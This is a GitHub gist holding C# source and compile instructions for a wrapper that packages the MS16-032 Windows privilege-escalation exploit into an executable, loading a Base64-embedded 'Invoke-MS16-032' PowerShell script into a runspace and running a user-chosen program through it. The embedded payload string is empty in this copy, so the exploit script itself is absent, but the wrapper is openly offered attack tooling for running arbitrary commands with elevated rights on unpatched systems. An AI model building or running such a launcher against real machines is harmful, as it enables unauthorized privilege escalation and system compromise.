Skip to content

Instantly share code, notes, and snippets.

@Ridter
Last active September 21, 2017 04:06
Show Gist options
  • Save Ridter/e03bb269b50d2be62fb6c5a973f7b52d to your computer and use it in GitHub Desktop.
Save Ridter/e03bb269b50d2be62fb6c5a973f7b52d to your computer and use it in GitHub Desktop.
MS16_032 powershell to exe
/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
*/
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
namespace ConsoleApplication1
{
class Program
{
static string _application;
static string _commandline;
static int Main(string[] args)
{
if (args.Length == 0)
{
System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c clac.exe\"");
return 1;
}
else if (args.Length ==1)
{
_application = args[0];
PowerShellExecutor t = new PowerShellExecutor();
t.ExecuteSynchronously(_application, "");
}
else if(args.Length == 2)
{
_application = args[0];
_commandline = args[1];
PowerShellExecutor t = new PowerShellExecutor();
t.ExecuteSynchronously(_application, _commandline);
}
return 0;
}
}
class PowerShellExecutor
{
public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));
public void ExecuteSynchronously(string aplication,string commandline)
{
string Commandout;
InitialSessionState iss = InitialSessionState.CreateDefault();
Runspace rs = RunspaceFactory.CreateRunspace(iss);
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(PSInvoke_MS16_032);
if (commandline != "")
{
Commandout = "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline " + "\""+commandline+"\"";
}
else{
Commandout = "Invoke-MS16-032 -Application " + aplication;
}
Console.WriteLine(Commandout);
ps.AddScript(Commandout);
ps.AddCommand("Out-Default");
ps.Invoke();
rs.Close();
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment